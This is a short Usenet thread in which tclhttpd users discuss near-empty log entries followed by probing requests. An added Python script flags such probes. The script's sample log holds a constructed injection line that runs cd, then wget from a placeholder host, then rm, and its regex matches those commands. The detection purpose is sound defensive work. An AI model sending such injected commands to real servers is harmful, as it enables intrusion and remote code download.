Thread from comp.lang.tcl (4 replies)

tclhttpd logs
Posted by saito <saitology9@gmail.com> 3 months ago

I wonder if anyone is familiar with tclhttpd log entries and can shed 
some light on this:

Typically each log entry contains a bunch of attributes including the IP 
address, a timestamp, the requested URL, user agent, HTTP code, etc. 
But I am seeing an increasing number of weird entries where most of that 
info is empty. The lines only include the IP address and the timestamp, 
and the rest is just "- - - - -".

What does this mean?

Re: tclhttpd logs
Posted by Colin Macleod <user7@cmacleod.me.uk.invalid> 3 months ago

saito <saitology9@gmail.com> posted:

> I wonder if anyone is familiar with tclhttpd log entries and can shed 
> some light on this:
> 
> Typically each log entry contains a bunch of attributes including the IP 
> address, a timestamp, the requested URL, user agent, HTTP code, etc. 
> But I am seeing an increasing number of weird entries where most of that 
> info is empty. The lines only include the IP address and the timestamp, 
> and the rest is just "- - - - -".
> 
> What does this mean?

Yes I see this occasionally, got a single one yesterday, none today.  I don't know what causes it though.

-- 
Colin Macleod.

Re: tclhttpd logs
Posted by saito <saitology9@gmail.com> 3 months ago

On 7/3/2024 3:00 PM, Colin Macleod wrote:
> 
> Yes I see this occasionally, got a single one yesterday, none today.  I don't know what causes it though.
> 

Yeah, it doesn't look kosher. I saw like 10 of them like that one after 
another.  Then I get normal entries from the same source but the 
requests all appear to be hacking attempts containing shell commands 
with rm, cd, wget, or some .php stuff.
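
The pattern described in this thread (runs of entries carrying only an IP address and a timestamp, then probing requests from the same source) can be flagged with a short script. This is an added example, not code from the thread or from tclhttpd; the log line layout, the sample lines and the names `triage`, `is_blank`, `LINE_RE` and `PROBE_RE` are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines. The layout (ip, [timestamp], then request fields,
# "-" for an empty field) is an assumption, not tclhttpd's documented format.
SAMPLE_LOG = """\
203.0.113.7 [03/Jul/2024:14:01:10] - - - - -
203.0.113.7 [03/Jul/2024:14:01:11] - - - - -
203.0.113.7 [03/Jul/2024:14:01:15] "GET /cgi-bin/x?cmd=cd+/tmp;wget+http://example.invalid/a;rm+-f+a HTTP/1.1" 404 - "-" "-"
198.51.100.4 [03/Jul/2024:14:02:00] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 [03/Jul/2024:14:03:00] - - - - -
192.0.2.33 [03/Jul/2024:14:04:00] "GET /wp-login.php HTTP/1.1" 404 - "-" "curl/8.0"
"""

LINE_RE = re.compile(r"^(\S+) \[[^\]]*\] (.*)$")
# Words named in the thread (rm, cd, wget) used as commands, or a .php path.
PROBE_RE = re.compile(r"[;&|=\s](?:rm|cd|wget)\s|\.php\b")


def is_blank(rest):
    """True when every field after the timestamp is just '-'."""
    fields = rest.split()
    return bool(fields) and all(f == "-" for f in fields)


def triage(log_text):
    """Per source IP: count blank entries and probes, and note blank-then-probe."""
    stats = defaultdict(lambda: {"blank": 0, "probe": 0, "blank_then_probe": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # layout not recognised: skip rather than guess
        ip, rest = m.groups()
        entry = stats[ip]
        if is_blank(rest):
            entry["blank"] += 1
        elif PROBE_RE.search(unquote_plus(rest)):
            entry["probe"] += 1
            entry["blank_then_probe"] = entry["blank_then_probe"] or entry["blank"] > 0
    return dict(stats)


if __name__ == "__main__":
    for ip, entry in triage(SAMPLE_LOG).items():
        if entry["blank_then_probe"]:
            print(ip, entry)
```

Adjust `LINE_RE` to the actual layout of the log file before running this over real logs.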

Re: tclhttpd logs
Posted by Colin Macleod <user7@cmacleod.me.uk.invalid> 3 months ago

saito <saitology9@gmail.com> posted:

> 
> Yeah, it doesn't look kosher. I saw like 10 of them like that one after 
> another.  Then I get normal entries from the same source but the 
> requests all appear to be hacking attempts containing shell commands 
> with rm, cd, wget, or some .php stuff.

Here's a little thing I hacked up to return something suitable to the script kiddies who persist in probing for PHP weaknesses etc.:
http://paste.tclers.tk/5935

-- 
Colin Macleod.

Re: tclhttpd logs
Posted by saito <saitology9@gmail.com> 3 months ago

On 7/4/2024 4:02 AM, Colin Macleod wrote:
> 
> Here's a little thing I hacked up to return something suitable to the script kiddies who persist in probing for PHP weaknesses etc.:
> http://paste.tclers.tk/5935
> 

Nice! They definitely deserve it :-)
